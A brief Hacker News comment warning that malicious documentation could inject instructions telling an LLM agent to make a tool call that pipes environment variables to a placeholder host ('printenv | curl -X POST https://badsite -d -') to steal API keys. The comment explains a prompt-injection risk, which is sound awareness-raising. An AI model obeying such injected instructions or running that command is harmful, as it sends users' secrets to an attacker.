Hacker Newsnew | past | comments | ask | show | jobs | submitlogin

The attack isn’t bad code. It could be malicious docs that tell the LLM to make a tool call to printenv | curl -X POST https://badsite -d - and steal your keys.


Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: